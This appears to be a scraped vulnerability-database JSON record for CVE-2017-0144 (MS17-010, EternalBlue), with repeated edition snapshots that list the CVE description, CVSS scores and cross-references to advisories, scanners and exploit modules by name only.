{"bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-07-20T20:10:58", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", 
"CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], "type": "attackerkb"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-20T20:10:58", "rev": 2, "value": 6.6, "vector": "NONE"}}, "hash": "090380c425da75da55c5435af43a40c07123d2b1ba124898ff5660e42a0e6128", "hashmap": [{"hash": "0404a0b8374966187f59ed4a2b846395", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "127216f4a57b3845fca792aa41d3d054", "key": "references"}, {"hash": "f3f172d109ebf206391628f4241045e7", "key": "cvelist"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "33304c5ad4f24166080d70e5d2fa6357", "key": "modified"}, {"hash": "d650c395d3b7dd2f2da9517bdf7ca6dc", "key": "title"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6e0b7952dde138a784afb955c0264daf", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "77e144ca40ee58b38f8310032f97520a", "key": "href"}, {"hash": 
"5e5266bea17c39e5ee12abd5fcbf7c2b", "key": "reporter"}, {"hash": "dbbc8fce9a59d0a898c44c4f99244f4a", "key": "type"}], "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "lastseen": "2021-07-20T20:10:58", "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "AttackerKB", "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 7}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-07-20T20:10:58"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 4}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka 
\u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "enchantments": {"dependencies": {"modified": "2021-05-06T15:17:29", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", 
"THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], "type": "attackerkb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-05-06T15:17:29", "rev": 2, "value": 7.0, "vector": "NONE"}}, "hash": "3ba02f64891708bebd3f92e625e2cb46", "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "last_activity": null, "lastseen": "2021-05-06T15:17:29", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/42030", 
"https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 4, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "tags"], "edition": 2, "lastseen": "2021-05-06T15:17:29"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 4}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", 
"enchantments": {"dependencies": {"modified": "2021-07-01T15:33:54", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], 
"type": "mskb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], "type": "attackerkb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-01T15:33:54", "rev": 2, "value": 7.0, "vector": "NONE"}}, "hash": "e43e8fdf94a88237551f15a2db18b64c", "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "last_activity": "2000-01-01T10:00:00", "lastseen": "2021-07-01T15:33:54", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.6", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", 
"https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "reporter": "AttackerKB", "tags": ["easy_to_develop", "common_enterprise", "pre_auth"], "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 6, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "mitre_vector", "description"], "edition": 3, "lastseen": "2021-07-01T15:33:54"}], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": 
"exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", 